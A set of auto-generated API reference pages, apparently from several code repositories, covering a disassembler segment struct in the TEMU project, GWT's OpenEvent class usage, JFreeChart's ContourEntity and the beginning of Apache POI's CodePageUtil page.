href="functions.html"><span>Data&nbsp;Fields</span></a></li> </ul> </div> </div> <div class="contents"> <h1>_segment Struct Reference</h1><!-- doxytag: class="_segment" --><code>#include &lt;<a class="el" href="disasm_8h-source.html">disasm.h</a>&gt;</code> <p> <div class="dynheader"> Collaboration diagram for _segment:</div> <div class="dynsection"> <center><font size="2">[<a href="graph_legend.html">legend</a>]</font></center></div> <table border="0" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr><td colspan="2"><br><h2>Data Fields</h2></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">bfd_byte *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#35daad7d87d89d39d96123c95a35cf39">data</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">bfd_size_type&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#4353052ba84b94fdc2c607ebf3bccb0e">datasize</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">bfd_vma&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#3983a5064bb7c399cf5845e34d590802">end_addr</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="el" href="struct__queue.html">Queue</a>&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#276977701775ed278597a85f5d3d9c51">functions</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="el" href="structi386__instruction.html">Instruction</a> **&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#afa86f3ed9a0bea4e147153e03917fa5">insts</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">int&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#e91cfe7323d6f6fdf42e5854fe8c9859">is_code</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">struct <a class="el" href="struct__segment.html">_segment</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#2b73fade77e969687c4d5c56c7c7671b">next</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">asection *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#5e62f31dc536b2f0a7a9f4eadd38c834">section</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">bfd_vma&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#26369753cbef5376e7c4ba439c490b8d">start_addr</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">unsigned char *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="struct__segment.html#ce9b9737544780d3743b2313c604663b">status</a></td></tr> </table> <hr><a name="_details"></a><h2>Detailed Description</h2> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00267">267</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> <hr><h2>Field Documentation</h2> <a class="anchor" name="35daad7d87d89d39d96123c95a35cf39"></a><!-- doxytag: member="_segment::data" ref="35daad7d87d89d39d96123c95a35cf39" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">bfd_byte* <a class="el" href="struct__segment.html#35daad7d87d89d39d96123c95a35cf39">_segment::data</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00269">269</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="4353052ba84b94fdc2c607ebf3bccb0e"></a><!-- doxytag: member="_segment::datasize" ref="4353052ba84b94fdc2c607ebf3bccb0e" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">bfd_size_type <a class="el" href="struct__segment.html#4353052ba84b94fdc2c607ebf3bccb0e">_segment::datasize</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00270">270</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="3983a5064bb7c399cf5845e34d590802"></a><!-- doxytag: member="_segment::end_addr" ref="3983a5064bb7c399cf5845e34d590802" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">bfd_vma <a class="el" href="struct__segment.html#3983a5064bb7c399cf5845e34d590802">_segment::end_addr</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00273">273</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="276977701775ed278597a85f5d3d9c51"></a><!-- doxytag: member="_segment::functions" ref="276977701775ed278597a85f5d3d9c51" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="struct__queue.html">Queue</a> <a class="el" href="struct__segment.html#276977701775ed278597a85f5d3d9c51">_segment::functions</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00281">281</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="afa86f3ed9a0bea4e147153e03917fa5"></a><!-- doxytag: member="_segment::insts" ref="afa86f3ed9a0bea4e147153e03917fa5" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="structi386__instruction.html">Instruction</a>** <a class="el" href="struct__segment.html#afa86f3ed9a0bea4e147153e03917fa5">_segment::insts</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00278">278</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> <p>Referenced by <a class="el" href="junk_8c-source.html#l00671">detect_junk_insts()</a>.</p> </div> </div><p> <a class="anchor" name="e91cfe7323d6f6fdf42e5854fe8c9859"></a><!-- doxytag: member="_segment::is_code" ref="e91cfe7323d6f6fdf42e5854fe8c9859" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int <a class="el" href="struct__segment.html#e91cfe7323d6f6fdf42e5854fe8c9859">_segment::is_code</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00276">276</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="2b73fade77e969687c4d5c56c7c7671b"></a><!-- doxytag: member="_segment::next" ref="2b73fade77e969687c4d5c56c7c7671b" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">struct <a class="el" href="struct__segment.html">_segment</a>* <a class="el" href="struct__segment.html#2b73fade77e969687c4d5c56c7c7671b">_segment::next</a><code> [read]</code> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00283">283</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="5e62f31dc536b2f0a7a9f4eadd38c834"></a><!-- doxytag: member="_segment::section" ref="5e62f31dc536b2f0a7a9f4eadd38c834" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">asection* <a class="el" href="struct__segment.html#5e62f31dc536b2f0a7a9f4eadd38c834">_segment::section</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00275">275</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <a class="anchor" name="26369753cbef5376e7c4ba439c490b8d"></a><!-- doxytag: member="_segment::start_addr" ref="26369753cbef5376e7c4ba439c490b8d" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">bfd_vma <a class="el" href="struct__segment.html#26369753cbef5376e7c4ba439c490b8d">_segment::start_addr</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00272">272</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> <p>Referenced by <a class="el" href="junk_8c-source.html#l00671">detect_junk_insts()</a>.</p> </div> </div><p> <a class="anchor" name="ce9b9737544780d3743b2313c604663b"></a><!-- doxytag: member="_segment::status" ref="ce9b9737544780d3743b2313c604663b" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">unsigned char* <a class="el" href="struct__segment.html#ce9b9737544780d3743b2313c604663b">_segment::status</a> </td> </tr> </table> </div> <div class="memdoc"> <p> <p>Definition at line <a class="el" href="disasm_8h-source.html#l00279">279</a> of file <a class="el" href="disasm_8h-source.html">disasm.h</a>.</p> </div> </div><p> <hr>The documentation for this struct was generated from the following file:<ul> <li><a class="el" href="disasm_8h-source.html">disasm.h</a></ul> </div> <hr> <p class="footer"> Generated on Fri Mar 30 16:18:26 2012 for <a href="http://bitblaze.cs.berkeley.edu/temu.html">TEMU</a> by <a href="http://www.doxygen.org"><img src="doxygen.png" alt="Doxygen" align="middle" border="0"/>1.5.8</a><br/> Copyright &copy; 2008-2009, BitBlaze Project. All Rights Reserved.</p> <hr> <!--#include virtual="/attrib.incl" --> </body> </html>
web/WEB-INF/classes/gwt-2.6.0/doc/javadoc/com/google/gwt/event/logical/shared/class-use/OpenEvent.html
JakaCikac/dScrum
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <TITLE> Uses of Class com.google.gwt.event.logical.shared.OpenEvent (Google Web Toolkit Javadoc) </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class com.google.gwt.event.logical.shared.OpenEvent (Google Web Toolkit Javadoc)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> GWT 2.6.0</EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?com/google/gwt/event/logical/shared//class-useOpenEvent.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="OpenEvent.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>com.google.gwt.event.logical.shared.OpenEvent</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.google.gwt.event.logical.shared"><B>com.google.gwt.event.logical.shared</B></A></TD> <TD>Types related to logical events that do not have direct analogues to DOM events and which can be used in contexts other than web browsers.&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.google.gwt.user.client.ui"><B>com.google.gwt.user.client.ui</B></A></TD> <TD>Widgets, Panels, and other user-interface classes.&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.google.gwt.event.logical.shared"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A> in <A HREF="../../../../../../../com/google/gwt/event/logical/shared/package-summary.html">com.google.gwt.event.logical.shared</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../../../com/google/gwt/event/logical/shared/package-summary.html">com.google.gwt.event.logical.shared</A> with parameters of type <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>OpenHandler.</B><B><A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenHandler.html#onOpen(com.google.gwt.event.logical.shared.OpenEvent)">onOpen</A></B>(<A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A>&lt;<A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenHandler.html" title="type parameter in OpenHandler">T</A>&gt;&nbsp;event)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Called when <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared"><CODE>OpenEvent</CODE></A> is fired.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.google.gwt.user.client.ui"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A> in <A HREF="../../../../../../../com/google/gwt/user/client/ui/package-summary.html">com.google.gwt.user.client.ui</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../../../com/google/gwt/user/client/ui/package-summary.html">com.google.gwt.user.client.ui</A> with parameters of type <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ListenerWrapper.WrappedOldDisclosureHandler.</B><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/ListenerWrapper.WrappedOldDisclosureHandler.html#onOpen(com.google.gwt.event.logical.shared.OpenEvent)">onOpen</A></B>(<A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A>&lt;<A HREF="../../../../../../../com/google/gwt/user/client/ui/DisclosurePanel.html" title="class in com.google.gwt.user.client.ui">DisclosurePanel</A>&gt;&nbsp;event)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>ListenerWrapper.WrappedTreeListener.</B><B><A HREF="../../../../../../../com/google/gwt/user/client/ui/ListenerWrapper.WrappedTreeListener.html#onOpen(com.google.gwt.event.logical.shared.OpenEvent)">onOpen</A></B>(<A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared">OpenEvent</A>&lt;<A HREF="../../../../../../../com/google/gwt/user/client/ui/TreeItem.html" title="class in com.google.gwt.user.client.ui">TreeItem</A>&gt;&nbsp;event)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../com/google/gwt/event/logical/shared/OpenEvent.html" title="class in com.google.gwt.event.logical.shared"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> GWT 2.6.0</EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?com/google/gwt/event/logical/shared//class-useOpenEvent.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="OpenEvent.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
libs/jfreechart-1.0.16/javadoc/org/jfree/chart/entity/class-use/ContourEntity.html
Mr-Steve/LTSpice_Library_Manager
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0-ea) on Thu Sep 26 11:52:57 CDT 2013 --> <title>Uses of Class org.jfree.chart.entity.ContourEntity (JFreeChart Class Library (version 1.0.16))</title> <meta name="date" content="2013-09-26"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.jfree.chart.entity.ContourEntity (JFreeChart Class Library (version 1.0.16))"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../org/jfree/chart/entity/ContourEntity.html" title="class in org.jfree.chart.entity">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/jfree/chart/entity/class-use/ContourEntity.html" target="_top">Frames</a></li> <li><a href="ContourEntity.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.jfree.chart.entity.ContourEntity" class="title">Uses of Class<br>org.jfree.chart.entity.ContourEntity</h2> </div> <div class="classUseContainer">No usage of org.jfree.chart.entity.ContourEntity</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../org/jfree/chart/entity/ContourEntity.html" title="class in org.jfree.chart.entity">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/jfree/chart/entity/class-use/ContourEntity.html" target="_top">Frames</a></li> <li><a href="ContourEntity.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
lib/docs/apidocs/org/apache/poi/util/CodePageUtil.html
setu9760/Jade_project_repo
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="ru"> <head> <title>CodePageUtil (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="CodePageUtil (POI API Documentation)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/CodePageUtil.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../org/apache/poi/util/CloseIgnoringInputStream.html" title="class in org.apache.poi.util"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../org/apache/poi/util/CommonsLogger.html" title="class in org.apache.poi.util"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/poi/util/CodePageUtil.html" target="_top">Frames</a></li> <li><a href="CodePageUtil.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.apache.poi.util</div> <h2 title="Class CodePageUtil" class="title">Class CodePageUtil</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>org.apache.poi.util.CodePageUtil</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="strong">CodePageUtil</span> extends java.lang.Object</pre> <div class="block">Utilities for working with Microsoft CodePages. <p>Provides constants for understanding numeric codepages, along with utilities to translate these into Java Character Sets.</p></div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field_summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th 